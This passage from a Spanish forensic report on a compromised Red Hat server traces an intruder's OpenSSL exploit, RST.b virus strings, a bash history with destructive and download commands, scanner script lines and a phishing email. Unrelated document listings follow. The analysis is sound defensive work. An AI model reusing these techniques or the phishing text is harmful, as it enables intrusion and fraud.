20 Y[_^ZY[ ZY[= [SQRVW tbsqr ZY[= ZY[= [X_^ZY[ DOM` /bin/sh xxxxyyyyzzzz Y[XXXXXX GET /~telcom69/gov.php HTTP/1.0 Despues de revisar varios archivos que aparecen modificados a partir del 29 encontramos que el virus se instalo en prácticamente la mayoría de los ejecutables de uso común del sistema, algunos de los archivos infectados fueron netstat, mt, mktemp, mknod, mkdir, mail, ls, ln, hostname, de, df, dd, cpio, chown y chgrp. Un ejercicio adicional consistió en buscar dentro de hda3.dd evidencia del exploit usado para obtener acceso, esto debido a que probablemente y por el perfil del atacante (Que anteriormente supusimos), es factible que vaya a intentar usar nuestro host como plataforma para lanzar nuevos ataques, basados en el documento de Keven Murphy buscamos por la dirección de correo del autor (Solar Eclipse) la linea ejecutada fue la siguiente: #./parser.pl "solareclipse" /media/cdrecorder/hda6.dd solar.txt Y encontramos una linea del exploit: * by Solar Eclipse <solareclipse@phreedom.org> Resta poco por hacer ahora que ya tenemos la tesis sobre el ataque, finalmente analicemos la actividad del atacante para los días siguientes (30 y 31 de Enero). Para el día 30 solo encontramos actividad a las 4 AM, y esta fue genera probablemente por el cron de la maquina. Para el día 31 tenemos actividad en psybnc a las 3:12: 31 ene 3:12 /var/tmp/psybnc/user1.log 31 ene 3:12 /var/tmp/psybnc/. 31 ene 3:12 /var/tmp/psybnc/scripts.. 31 ene 3:12 /var/tmp/psybnc/help.. 31 ene 3:12 /var/tmp/psybnc/menuconf.. 31 ene 3:12 /var/tmp/psybnc/tools.. 31 ene 3:12 /var/tmp/psybnc/motd.. 20

21 31 ene 3:12 /var/tmp/psybnc/log.. 31 ene 3:12 /var/tmp psybnc El archivo /var/tmp/psybnc/log/psybnc.log nos muestra que el IRC Proxy Server arranco con fallas: Sat Jan 29 15:46:42 :Listener created : port Sat Jan 29 15:46:42 :Error Creating Socket Sat Jan 29 15:46:42 :Can't create listening sock on host * port Sat Jan 29 15:46:42 :Can't set a suitable Host for DCC Chats or Files. Please de fine at least one Listener for an IP. Sat Jan 29 15:46:42 :psybnc2.2.1-cbtitlddmsnp started (PID :24907) A las 4:02 encontramos otra serie de archivos modificados, entre ellos el rpmpkgs, ahora si podemos desechar totalmente la idea de realizar un análisis de verificación de firmas. 31 ene 4:02 /var/lib/logrotate.status 31 ene 4:02 /var/lib/rpm 31 ene 4:02 /var/lib/rpm. 31 ene 4:02 /var/log rpmpkgs 31 ene 4:02 /var/log. 31 ene 4:02 /var/spool/anacron/cron.daily 31 ene 4:02 /var/log 31 ene 4:12 /var/lib/slocate 31 ene 4:12 /var/lib/slocate/slocate.db 31 ene 4:12 /var/lib/slocate. A las 11:54 aparecen dos nuevas herramientas w00t que trae una serie de exploits y backdoors, y selena que trae el escáner de puertos pscan2 y unas utilerías para escanear vulnerabilidades, este paquete también estaba infectado con el virus RST.b o alguna de sus variantes: /bin/sh xxxxyyyyzzzz 21

22 Y[XXXXXX GET /~telcom69/gov.php HTTP/ ene 11:54 /var/tmp/w00t.. 31 ene 11:54 /var/tmp/psybnc.. 31 ene 11:54 /var/tmp/selena.. 31 ene 11:54 /var/tmp/selena/ssvuln 31 ene 11:54 /var tmp 31 ene 11:54 /var/tmp. Y por consecuencia se da la infección de más programas dentro de la maquina: 31 ene 12:03 /bin/setserial 31 ene 12:03 /bin/ping 31 ene 12:03 /bin/netstat 31 ene 12:03 /bin/mt 31 ene 12:03 /bin/mktemp 31 ene 12:03 /bin/mknod 31 ene 12:03 /bin/mkdir 31 ene 12:03 /bin/mail 31 ene 12:03 /bin/ls 31 ene 12:03 /bin/ln 31 ene 12:03 /bin/hostname 31 ene 12:03 /bin/ed 31 ene 12:03 /bin/df 31 ene 12:03 /bin/dd 31 ene 12:03 /bin/cpio 31 ene 12:03 /bin/chown 31 ene 12:03 /bin/chgrp Mas actividad de selena, y nuevamente un archivo.bash_history. 31 ene 12:03 /var/tmp/selena/sslex 31 ene 12:03 /var/tmp/selena/ ssl.out 31 ene 12:03 /var/tmp/selena/ssx 31 ene 12:03 /var/tmp/selena/sslx 31 ene 12:03 /var/tmp/selena/ssl 31 ene 12:03 /var/tmp.bash_history 22

23 Correos en cola, para root: 31 ene 13:31 /var/spool/mqueue/dfj0vjv0a ene 13:31 /tmp/logwatch.xxlltdiy.. 31 ene 13:31 /tmp/makewhatisnuab1j.. 31 ene 13:31 /tmp/makewhatislzwx4z.. 31 ene 13:31 /tmp. 31 ene 13:31 /tmp 31 ene 14:59 /var/spool/mqueue/qfj0vjv0a ene 15:20 /var/spool/mail/root 31 ene 15:20 /var/spool/mail. 31 ene 15:20 /var/spool/mqueue. 31 ene 15:20 /var/spool/mqueue 31 ene 15:20 /var/spool/mail 31 ene 15:20 /etc/mail/statistics Y finalmente la ejecución del fichero /etc/mrtg: 31 ene 15:25 /etc/mrtg mrtg.ok 31 ene 15:25 /etc/mrtg. 31 ene 15:25 /etc mrtg Analizaremos ahora la actividad en el último.bash_history que encontramos, anexo comentarios en rojo: w Verifica la identidad del usuario con el que se encuentra cd /var/tmp Se cambia al directorio /var/tmp y lista el contenido, note que nuevamente ejecuta ls -sa y dir, suponemos que se trata del mismo atacante. ls -sa dir rm -rf /tmp/* Elimina el contenido de /tmp/ y se cambia al directorio /var/log cd /var/log dir exit Intenta abandonar el shell con el que se encontraba y verifica la identidad del usuario nuevamente. id Se cambia a /var/tmp y lista el contenido cd /var/tmp 23

24 ls dir Descarga woot.tgz del que anteriormente hablamos, lo desempaqueta y ejecuta el asmb que es un escáner y exploit de vulnerabilidades de SAMBA para redes clase B wget tar xvfz woot.tgz cd w00t./asmb Se cambia a /dev/shm y descarga psyz.tar.gz que es otro paquete del psybnc, como vimos anteriormente parece que tuvo problemas para arrancarlo. ls dir cd /dev/shm dir wget tar xzvf psyz.tar.gz rm -rf psyz.tar.gz Cambia de opinión y elimina el paquete que acaba de descargar, mejor baja un archivo preconfigurado de psybnx, oculta el ejecutable como ps ax e inicia el servicio de psybnc mv psybnc local cd local rm -rf psybnc.conf* wget mv psybnc "ps ax" export PATH="." "ps ax" Regresa a /var/tmp y elimina el anteriormente descargado woot.tgz, nuevamente intenta instalar el psybnc.tgz cd var/tmp dir rm -rf woot.tgz dir wget tar xvfz psybnc.tgz cd psybnc./psybnc w exit w Aquí finalmente descarga selena.tgz y ejecuta assl. ps aux cd /var/tmp ls dir 24

25 wget tar xvfz selena.tgz cd selena./assl Cuando echamos un ojo a assl resulta ser un shell script que ejecuta una de las variantes de exploits que se aprovechan de la vulnerabilidad de Apache OpenSSL y realiza escaneos masivos sobre redes clase b, utiliza el escaner de puertos pscan2 para obtener informacion acerca del puerto 443 y luego ejecuta una variante del exploit openssl-too-open para obtener acceso, existe una gran posibilidad de que este haya sido el mismo exploit usado para obtener acceso a nuestro Host. a continuación unas líneas obtenidas de el: echo "# scanner for the apache 0p3nSSL vuln by insider" echo "# PRIVATE PRIVATE PRIVATE" echo "# DON'T DISTRIBUTE" echo " " echo "# starting scan..."./pscan2 $1 443 Finalmente echamos un vistazo a la que quedo en la cola de correo (En un análisis forense en forma, seria bastante conveniente solicitar permiso por escrito para ello, recordemos que el correo electrónico es privado), ahí encontramos 4 archivos 2 vacíos, 1 es una notificación de un correo no entregado a yahoo, y el otro es el correo, se trata de un intento de Pishing por parte del atacante hacia mailpentruspam@yahoo.com para obtener información de una cuenta bancaria, este texto fue encontrado en el correo: <p>dear Washington Mutual customer,</p> your </p> <p>wamu is committed to maintaining a safe environment for its community of buyers and sellers.protecting the security of account and of the Washington Mutual network is our primary concern. In this respect,as a preventative measure,we have recently revised your account information data in order to assure ourselves that the most advanced security techniques in the world and our anti-fraud teams regularly screen the WAMU system for any unusual activity.as our part of the job is done, there is only one step further for you to take, so that we can thoroughly guarantee our services. Therefore, if you are the rightful holder of the account please fill in the form below so that we can check the compliance with our database. 25

26 Como ejercicio adicional buscamos evidencia para el mes de Febrero con nuestro script usando la linea./parser.pl "Feb" RTF/hda3.dd/hda3.dd Feb.txt. Al no encontrar nada corroboramos que la actividad finalizo el 29 de Enero y damos por concluida esta parte del análisis. Finalmente para corroborar nuestra tesis sobre el ataque usamos las herramienta de Sleuthkit y Autopsy. Dichas herramientas pueden ser obtenidas de Autopsy proporciona una herramienta grafica mediante un browser que facilita el análisis pro bloques de las imágenes, en el sitio de sleuthkit se encuentran guías detalladas de la instalación de las herramientas, nuevamente basados en la idea de que este no debe ser un manual de instalación sino una referencia para el análisis se explica a grosso modo el uso de autopsy, y se deja referencia para quien quiera ahondar en el tema. Procedamos pues con el análisis, arrancamos autopsy con el comando./autopsy, ahora podemos abrir una ventana del navegador de Internet y ver autopsy en el URL en dicha ventana abrimos un nuevo caso con el botón New case : Llenamos el formulario y guardamos el caso, posteriormente abrimos el caso con el botón Open case y seleccionamos la opción para agregar un nuevo host, dejamos la Zona horaria en blanco ya que 26

27 como vimos anteriormente esta corresponde a la ciudad de México y coincide con la instalada en nuestro laboratorio: Una a una agregamos las imágenes al caso, cuidando que el tipo coincida linux-ext3 como vimos anteriormente, y cuidando que el 27

28 punto de montaje sea el que encontramos en el fstab en un principio, a excepción de hda6.dd que como habíamos visto corresponde a memoria swap por lo que no es necesario especificar punto de montaje. Una vez montadas todas las imágenes podemos navegar por el sistema de archivos simplemente seleccionando la imagen y usando la utilería File análisis, por ejemplo a navegar hacia /var/log en hda3.dd vemos la existencia de los logs del sistema: 28

29 Usamos la utilería Time Line análisis para generar una linea de tiempo sobre el sistema, a continuación se exponen algunos detalles de dicha linea de tiempo, intercalo comentarios en rojo: Se detiene el servicio de nscd Sat Jan :14:57 0.a. l/-rw root root /etc/rc.d/rc2.d/k74nscd (deleted) 0.a. -rw root root <hda1.dd-dead-18398> 0.a. -/-rw apache root /var/run/httpd.mm.723.sem 0.a. -rw root root <hda1.dd-dead-18399> 0.a. l/-rw root root /etc/rc.d/rc5.d/k74nscd (deleted) Sat Jan :15:41 0.a. -rwxr-xr-x apache apache 959 <hda1.dd-dead-959> El usuario apache intenta editar el archivo sshd_config, lo que refuerza la teoría de que el atacante ingreso con dicho usuario 0.a. -/-rwxr-xr-x apache apache 959 /etc/ssh/sshd_config~ (deleted) Sat Jan :16: m.c d/drwxr-xr-x root root /dev m.c -/-rwxr-xr-x root root /bin/gawk Evidencia de la infección por el virus RST.b 0 mac -/ root root /dev/hdx1 0 mac -/ root root /dev/hdx m.c -/-rwxr-xr-x root root /bin/gawk Evidencia de la creación del usuario weed. Sat Jan :17:13 24 mac -/-rw-r--r-- root root

30 /home/weed/.bash_logout /home/weed 4096 m.c d/drwx root root Esta ves autopsy no nos permitió rescatar ningún archivo sin embargo y como vemos los eventos de la linea de tiempo generada van coincidiendo con nuestro análisis, toda la linea fue analiza pero por cuestiones de espacio no se incluyo todo. Dada la evidencia consideramos el análisis concluyente y damos por cerrado el caso. Se adjunta en los archivos de apoyo la linea de tiempo generada. Pasaremos ahora al resumen y exposición de resultados. 3.- Resumen y resultados. 3.1 Resumen y resultados. Los resultados expuestos y la cronología del ataque se basan en la hora del Host atacado. Dicho Host tenia como zona horaria America/Mexico_City. El 29 de Enero del año en curso se presento un ataque en contra de la maquina cuyo perfil se describe a continuación: Nombre:Finanzas IP: y Sistema Operativo: Red Hat Linux release 7.3 (Valhalla) -Dicha maquina había sido reiniciada por ultima vez el el 20 de Enero alrededor de las 16:33 y estuvo expuesta a una serie de ataque de diccionario a partir de esa fecha, dichos ataques no rindieron fruto. -El 29 de Enero a las 15:14 aprovechándose de una vulnerabilidad en el OpenSSL 0.9.6b combinado con Apache un atacante usando la IP perteneciente a Altaway un proveedor de Hosting de Reno Nevada en los Estados Unidos, logra un introducirse en el equipo, usando un exploit que se aprovecha de una vulnerabilidad en openssl a través de Apache Web Server y le permite obtener un shell como el usuario apache que es quien ejecutaba el Web Server. 30

31 -A las 15:16 del mismo día, usando herramientas contenidas en el paquete za.tgz (zbind, zero, etc), el atacante obtiene una root shell. -A partir de las 15:16 y hasta las 15:46 aproximadamente, el atacante estuvo en el equipo con perfil de súper usuario, descargo herramientas que le permitirían mantener el acceso remoto al equipo (crk.tar.gz, https, sc.tgz, pico) una de esas herramientas (crk.tar.gz) pareciera haber estado contaminada con una variante del virus RST.b por lo que infecta el equipo. Adicionalmente el atacante crea y borra un usuario weed con perfil de superusuario (Probablemente con el mismo propósito). -De 15:46 a 17:53 el atacante instala un IRC Proxy Server llamado psybnc, sin embargo aparentemente no logra hacerlo funcionar, no se tiene más indicios de actividad del atacante para ese día - No se tienen indicios de actividad del atacante para el día 30 de Enero. - El día 31 de Enero a las 3:12 el atacante entra nuevamente y reintenta con el psybnc, en archivo de configuración del psybnc se encontró el nombre Angel. -Entre 4:02 y 4:12 se modifican una serie archivos en la maquina entre ellos rpmpkgs que contiene las firmas de los programas instalados en la maquina, probablemente para eludir el análisis forense. - Entre 11:52 y 13:31 el atacante descarga dos herramientas mas selena.tgz y woot.tgz, estos set de herramientas permitieron al atacante convertir el Host en una plataforma para lanzar nuevos ataques a redes clase B, los ataques intentados eran mediante el exploit de la vulnerabilidad de Apache + OpenSSL 0.9.6b el primero y vulnerabilidades en samba el segundo. El archivo selena.tgz contenía una variante del exploit openssl-too-open, probablemente la misma usada para vulnerar nuestro Host. - Entre 13:31 y 15:20 realiza un intento de Pishing para obtener información de una cuenta bancaria. No hay más actividad del atacante o del Host. 31

32 3.2 Perfil y motivación del atacante. La evidencia encontrada nos permite clasificar al atacante, creamos una categoría y dividimos a los Hackers según sus habilidades y conocimiento en Hackers de Elite, Hackers y Script Kiddie's, siendo los primeros los que tienen el nivel mas elevado y los últimos el nivel mas bajo, nuestro atacante caería en el nivel de Script Kiddie, el atacante utilizo siempre herramientas disponibles en la red, de las cuales la mayoría tenían firmas ya conocidas, durante el ataque mostró un comportamiento errático (Por ejemplo instalo de manera fallida varias herramientas para mantener el acceso remoto cuando solo una le hubiese sido suficiente), contamino el equipo con una variante del virus RST.b probablemente de manera no intencional (Simplemente no sabia que estaba haciendo) y problemente haya contaminado también el equipo del cual lanzo el ataque, dejo huellas claras de su paso por la maquina, y se arriesgo bastante para hacer funcionar un servidor Proxy para IRC, finalmente hizo de la maquina una plataforma para lanzar nuevos ataques. Este tipo de atacantes no tienen una motivación especifica, simplemente es el deseo de reconocimiento por parte de la comunidad Underground a la que pertenece y la emoción que le pudo haber producido el realizar el ataque. Es evidente que nuestro atacante hubiera atacado cualquier otra maquina que se topara y que estuviese vulnerable. Lamentablemente se topo con nuestra maquina. 3.3 Recomendaciones y conclusiones. El ataque tuvo éxito debido a que no se tuvo el cuidado adecuado para con la maquina. Se recomienda mantener el sistema actualizado, a la fecha existen parches y upgrades que permiten eliminar la vulnerabilidad que aquí fue explotada, un correcto manejo de las actualizaciones del sistema le permitirán mantener un sistema estable y más seguro. Existen medidas que hubiesen ayudado a detectar con tiempo el ataque, una buena medida seria tener un sistema de detección de intrusos (IDS), existen algunos gratuitos como SNORT actualmente existen firmas para este tipo de ataques. también es conveniente mantener un monitoreo de los 32

II Reto de Análisis Forense Hispano

II Reto de Análisis Forense Hispano II Reto de Análisis Forense Hispano http://www.seguridad.unam.mx/eventos/reto Víctor Barahona Tecnologías de la Información Universidad Autónoma de Madrid Jornadas de Análisis Forense 2005, Madrid Antecedentes

Más detalles

RETO FORENSE EPISODIO III Resumen Ejecutivo

RETO FORENSE EPISODIO III Resumen Ejecutivo RETO FORENSE EPISODIO III Resumen Ejecutivo José Antonio Valero Sánchez javalero@gmail.com Zaragoza, España 2006 Motivos de la intrusión. Después de analizar la imagen del sistema cabe destacar que el

Más detalles

Instituto Tecnológico Las Américas (ITLA) Sistemas Operativos 3 (SO3) Daniel Alejandro Moreno Martínez. Matrícula: 2010-2946.

Instituto Tecnológico Las Américas (ITLA) Sistemas Operativos 3 (SO3) Daniel Alejandro Moreno Martínez. Matrícula: 2010-2946. Instituto Tecnológico Las Américas (ITLA) Sistemas Operativos 3 (SO3) Daniel Alejandro Moreno Martínez Matrícula: 2010-2946 How to How to: Web Server (Apache)!!! Servidor Web El servidor HTTP Apache es

Más detalles

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable

Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)

Más detalles

Internet Information Server

Internet Information Server Internet Information Server Internet Information Server (IIS) es el servidor de páginas web avanzado de la plataforma Windows. Se distribuye gratuitamente junto con las versiones de Windows basadas en

Más detalles

Guía Rápida de Inicio

Guía Rápida de Inicio Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for SharePoint. Para disponer de instrucciones detalladas, por favor, diríjase

Más detalles

CONFIGURACIÓN DEL SERVIDOR

CONFIGURACIÓN DEL SERVIDOR CONFIGURACIÓN DEL SERVIDOR Una vez finalizadas las configuraciones iniciales de las interfaces y direcciones IPs, desde cualquier equipo de la red abrimos el navegador e introducimos la dirección IP del

Más detalles

GUIA APLICACIÓN DE SOLICITUDES POR INTERNET. Gestión de Cursos, Certificados de Aptitud Profesional y Tarjetas de Cualificación de Conductores ÍNDICE

GUIA APLICACIÓN DE SOLICITUDES POR INTERNET. Gestión de Cursos, Certificados de Aptitud Profesional y Tarjetas de Cualificación de Conductores ÍNDICE ÍNDICE ACCESO A LA APLICACIÓN... 2 1.- HOMOLOGACIÓN DE CURSOS... 4 1.1.- INICIAR EXPEDIENTE... 4 1.2.- CONSULTA DE EXPEDIENTES... 13 1.3.- RENUNCIA A LA HOMOLOGACIÓN... 16 2.- MECÁNICA DE CURSOS... 19

Más detalles

labs Linux para Administradores de Elastix Elastix Certification ELASTIX CERTIFICATION

labs Linux para Administradores de Elastix Elastix Certification ELASTIX CERTIFICATION Linux para Administradores de Elastix Elastix Certification 2012, PALOSANTO SOLUTIONS todos los derechos reservados. Esta documentación y su propiedad intelectual pertenece a PaloSanto Solutions. Cualquier

Más detalles

Pasamos ahora a definir brevemente cual es el método de conexión más habitual usando un entorno gráfico.

Pasamos ahora a definir brevemente cual es el método de conexión más habitual usando un entorno gráfico. Clientes de FTP en modo gráfico Introducción Ya vimos en la primera parte de nuestro curso de FTP, que la conexión a servidores inicialmente se realizaba (y aún se sigue haciendo) en modo texto. Aunque

Más detalles

Kiara Celeste Contreras Feliz. Matricula: 2011-2527. Sistema Operativo III. 5- Creación de usuarios y grupos

Kiara Celeste Contreras Feliz. Matricula: 2011-2527. Sistema Operativo III. 5- Creación de usuarios y grupos Nombre: Kiara Celeste Contreras Feliz Matricula: 2011-2527 Materia: Distribucion: How to: Profesor: Sistema Operativo III Open Suse 5- Creación de usuarios y grupos José Doñe Creación de usuarios y grupo

Más detalles

AGREGAR COMPONENTES ADICIONALES DE WINDOWS

AGREGAR COMPONENTES ADICIONALES DE WINDOWS INSTALACIÓN DE IIS EN WINDOWS XP El sistema está desarrollado para ejecutarse bajo la plataforma IIS de Windows XP. Por esta razón, incluimos la instalación de IIS (Servidor de Web) para la correcta ejecución

Más detalles

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD Fecha última revisión: Diciembre 2010 Tareas Programadas TAREAS PROGRAMADAS... 3 LAS TAREAS PROGRAMADAS EN GOTELGEST.NET... 4 A) DAR DE ALTA UN USUARIO...

Más detalles

INFORME EJECUTIVO ANÁLISIS FORENSE. Hostname: finanzas S.O.: Red Hat Linux versión 7.3 (Valhalla) Autor: Rafael García O.

INFORME EJECUTIVO ANÁLISIS FORENSE. Hostname: finanzas S.O.: Red Hat Linux versión 7.3 (Valhalla) Autor: Rafael García O. INFORME EJECUTIVO ANÁLISIS FORENSE Hostname: finanzas S.O.: Red Hat Linux versión 7.3 (Valhalla) Autor: Rafael García O. INTRODUCCIÓN La máquina finanzas, un servidor con S.O. Red Hat Linux versión 7.3

Más detalles

COMO CONFIGURAR UNA MAQUINA VIRTUAL EN VIRTUALBOX PARA ELASTIX

COMO CONFIGURAR UNA MAQUINA VIRTUAL EN VIRTUALBOX PARA ELASTIX COMO CONFIGURAR UNA MAQUINA VIRTUAL EN VIRTUALBOX PARA ELASTIX En este manual se presenta el proceso de configuración de una Maquina Virtual en VirtualBox, que será utilizada para instalar un Servidor

Más detalles

CÓMO INSTALAR CentOS CON RAID1

CÓMO INSTALAR CentOS CON RAID1 CÓMO INSTALAR CentOS CON RAID1 INTRODUCCIÓN Antes de comenzar daremos nombre a los discos duros para poder seguir sin problemas este manual. Al primer disco duro lo nombraremos Disco A Al segundo disco

Más detalles

WINDOWS 2008 5: TERMINAL SERVER

WINDOWS 2008 5: TERMINAL SERVER WINDOWS 2008 5: TERMINAL SERVER 1.- INTRODUCCION: Terminal Server proporciona una interfaz de usuario gráfica de Windows a equipos remotos a través de conexiones en una red local o a través de Internet.

Más detalles

MANUAL COPIAS DE SEGURIDAD

MANUAL COPIAS DE SEGURIDAD MANUAL COPIAS DE SEGURIDAD Índice de contenido Ventajas del nuevo sistema de copia de seguridad...2 Actualización de la configuración...2 Pantalla de configuración...3 Configuración de las rutas...4 Carpeta

Más detalles

Guía de Instalación para clientes de WebAdmin

Guía de Instalación para clientes de WebAdmin Panda Managed Office Protection Guía de Instalación para clientes de WebAdmin Tabla de contenidos 1. Introducción... 4 2. Instalación de Panda Managed Office Protection a partir de una instalación de Panda

Más detalles

AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7

AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7 Tutoriales de ayuda e información para todos los niveles AGREGAR UN EQUIPO A UNA RED Y COMPARTIR ARCHIVOS CON WINDOWS 7 Como agregar a una red existente un equipo con Windows 7 y compartir sus archivos

Más detalles

Tutorial: Primeros Pasos con Subversion

Tutorial: Primeros Pasos con Subversion Tutorial: Primeros Pasos con Subversion Introducción Subversion es un sistema de control de versiones open source. Corre en distintos sistemas operativos y su principal interfaz con el usuario es a través

Más detalles

Servidor. Comenzaremos por confirmar que el servicio NFS esta instalado y ejecutandose desde la terminal, escribiremos lo siguiente: #rpm -q nfs-utils

Servidor. Comenzaremos por confirmar que el servicio NFS esta instalado y ejecutandose desde la terminal, escribiremos lo siguiente: #rpm -q nfs-utils NFS Red Hat Enterprise Linux 6 provee dos mecanismos para compartir archivos y carpetas con otros sistemas operativos por medio de la red. Una de las opciones es utilizar una tecnologia llamada samba.

Más detalles

COMPROBACIONES BÁSICAS PARA EL USO DE FIRMA EN EL RTC

COMPROBACIONES BÁSICAS PARA EL USO DE FIRMA EN EL RTC TITULO: COMPROBACIONES BÁSICAS PARA EL USO DE FIRMA EN EL RTC RESUMEN: La idea de este documento es mostrar una serie de acciones y ayudas básicas para intentar determinar y solucionar problemas en la

Más detalles

Crear la base de datos antes de la instalación de Wordpress.

Crear la base de datos antes de la instalación de Wordpress. Introducción En este tutorial básico sobre instalar Wordpress en tu propio hosting mediante un panel de control cpanel y aprenderás como personalizar las bases de datos MySQL que utiliza Wordpress. Para

Más detalles

UNIDAD DIDACTICA 16 USUARIOS SAMBA EN UN CONTROLADOR DE DOMINIO LINUX SERVER

UNIDAD DIDACTICA 16 USUARIOS SAMBA EN UN CONTROLADOR DE DOMINIO LINUX SERVER UNIDAD DIDACTICA 16 USUARIOS SAMBA EN UN CONTROLADOR DE DOMINIO LINUX SERVER Eduard Lara 1 1. INTRODUCCIÓN En Windows Server: - Los usuarios y grupos dados de alta cuando el equipo es un servidor independiente,

Más detalles

UD 1: Adopción de pautas de seguridad informática

UD 1: Adopción de pautas de seguridad informática UD 1: Adopción de pautas de seguridad informática Análisis forense en sistemas informáticos Análisis forense en sistemas informáticos El análisis forense es la técnica de capturar, procesar e investigar

Más detalles

GESTIÓN DOCUMENTAL PARA EL SISTEMA DE CALIDAD

GESTIÓN DOCUMENTAL PARA EL SISTEMA DE CALIDAD GESTIÓN DOCUMENTAL PARA EL SISTEMA DE CALIDAD Manual de usuario 1 - ÍNDICE 1 - ÍNDICE... 2 2 - INTRODUCCIÓN... 3 3 - SELECCIÓN CARPETA TRABAJO... 4 3.1 CÓMO CAMBIAR DE EMPRESA O DE CARPETA DE TRABAJO?...

Más detalles

Autor: Microsoft Licencia: Cita Fuente: Ayuda de Windows

Autor: Microsoft Licencia: Cita Fuente: Ayuda de Windows Qué es Recuperación? Recuperación del Panel de control proporciona varias opciones que pueden ayudarle a recuperar el equipo de un error grave. Nota Antes de usar Recuperación, puede probar primero uno

Más detalles

Sistema NFS para compartir archivos.

Sistema NFS para compartir archivos. Sistema NFS para compartir archivos. NFS es el sistema que utiliza Linux para compartir carpetas en una red. Mediante NFS, un servidor puede compartir sus carpetas en la red. Desde los PCs de los usuarios

Más detalles

Instalación de la aplicación.

Instalación de la aplicación. Manual de Instalación del Auto apagado de la UPV. Versión 1.0.1. Marzo del 2010 Redactado por Guillermo García. Dudas o erratas a guillermogn@upv.es. Instalación de la aplicación. Introducción La aplicación

Más detalles

Software de Comunicaciones. Práctica 7 - Secure Shell. SSH

Software de Comunicaciones. Práctica 7 - Secure Shell. SSH Software de Comunicaciones Práctica 7 - Secure Shell. SSH Juan Díez-Yanguas Barber Software de Comunicaciones Ingeniería Informática - 5º Curso Jdyb - Mayo 2013 Juan Díez- Yanguas Barber Práctica 7 Índice

Más detalles

Prácticas A.S.O./A.S.O.P. - Boletín L08 NFS y NIS

Prácticas A.S.O./A.S.O.P. - Boletín L08 NFS y NIS Prácticas A.S.O./A.S.O.P. - Boletín L08 NFS y NIS NFS Notas: Esta práctica se va a realizar por parejas de ordenadores, uno hará de cliente y el otro de servidor. Recuerda que con la orden chkconfig se

Más detalles

Instalación del Admin CFDI

Instalación del Admin CFDI Instalación del Admin CFDI Importante!!!Antes de comenzar verifique los requerimientos de equipo esto podrá verlo en la guía 517 en nuestro portal www.control2000.com.mx en el apartado de soporte, ahí

Más detalles

Antivirus PC (motor BitDefender) Manual de Usuario

Antivirus PC (motor BitDefender) Manual de Usuario Antivirus PC (motor BitDefender) Manual de Usuario Índice 1. Introducción... 3 2. Qué es Antivirus PC?... 3 a. Eficacia... 3 b. Actualizaciones... 4 3. Requisitos técnicos... 4 a. Conocimientos técnicos...

Más detalles

10. El entorno de publicación web (Publiweb)

10. El entorno de publicación web (Publiweb) 10. El entorno de publicación web (Publiweb) 10.1. Introducción El entorno de publicación Web es una herramienta que permite la gestión de nuestras páginas Web de una forma visual. Algunos ejemplos de

Más detalles

INSTALACIÓN DE MEDPRO

INSTALACIÓN DE MEDPRO 1 Estimado Cliente: Uno de los objetivos que nos hemos marcado con nuestra nueva plataforma de gestión, es que un cliente pueda instalar MedPro y realizar su puesta en marcha de forma autónoma. Siga paso

Más detalles

Instalación de una entidad emisora de certificados

Instalación de una entidad emisora de certificados Instalación de una entidad emisora de certificados Para esto necesitamos tener instalador el IIS en Windows 2008 server (En inicio/administrador del servidor/funciones/agregar funciones). En la pantalla

Más detalles

MANUAL DE USUARIOS DEL SISTEMA MESA DE SOPORTE PARA SOLICITAR SERVICIOS A GERENCIA DE INFORMATICA

MANUAL DE USUARIOS DEL SISTEMA MESA DE SOPORTE PARA SOLICITAR SERVICIOS A GERENCIA DE INFORMATICA MANUAL DE USUARIOS DEL SISTEMA MESA DE SOPORTE PARA SOLICITAR SERVICIOS A Usuario Propietario: Gerencia de Informática Usuario Cliente: Todos los usuarios de ANDA Elaborada por: Gerencia de Informática,

Más detalles

Creación de imágenes. Pablo Sanz Mercado.

Creación de imágenes. Pablo Sanz Mercado. Creación de imágenes. Pablo Sanz Mercado. 1 Cuando hemos instalado un equipo, el tiempo que hemos invertido puede ser realmente elevado, pues no sólo está el tiempo de instalación del mismo, sino además

Más detalles

Curso de PHP con MySQL Gratis

Curso de PHP con MySQL Gratis Curso de PHP con MySQL Gratis Introducción Este mini curso o mini tutorial de PHP le ayudará a realizar cualquier sistema para que pueda insertar uno o varios registros a una base de datos con MySQL, este

Más detalles

Instalación de Elastix

Instalación de Elastix Instalación de Elastix Manual para la versión 1.3.2 PaloSanto Solutions Junio 2009 2009, PALOSANTO SOLUTIONS todos los derechos reservados. Esta documentación es confidencial y su propiedad intelectual

Más detalles

DOCENTES FORMADORES UGEL 03 PRIMARIA

DOCENTES FORMADORES UGEL 03 PRIMARIA DOCENTES FORMADORES UGEL 03 PRIMARIA 1. Recursos y Aplicaciones del Servidor La página de inicio del servidor (http://escuela) contiene los enlaces a las aplicaciones instaladas en el servidor, un enlace

Más detalles

Aplicación Portable para la captura de calificaciones

Aplicación Portable para la captura de calificaciones Aplicación Portable para la captura de calificaciones Manual de Usuario CONTENIDO PRÓLOGO Requerimientos Proceso Descarga de la aplicación portable Descarga de Archivo de evaluaciones Uso de la aplicación

Más detalles

Unicenter Service Desk r11.1. Guía para el Usuario Final de Service Desk

Unicenter Service Desk r11.1. Guía para el Usuario Final de Service Desk Unicenter Service Desk r11.1 Guía para el Usuario Final de Service Desk Índice Página Tema 3...Guía Para Usuario Final 3 Ingreso al Sistema 4.....Ventana de Inicio 4... Anuncios de Soporte Técnico 5...

Más detalles

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS

REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS REDES DE ÁREA LOCAL. APLICACIONES Y SERVICIOS EN WINDOWS Servicio DNS - 1 - Servicio DNS...- 3 - Definición... - 3 - Instalación... - 5 - Configuración del Servidor DNS...- 10 - - 2 - Servicio DNS Definición

Más detalles

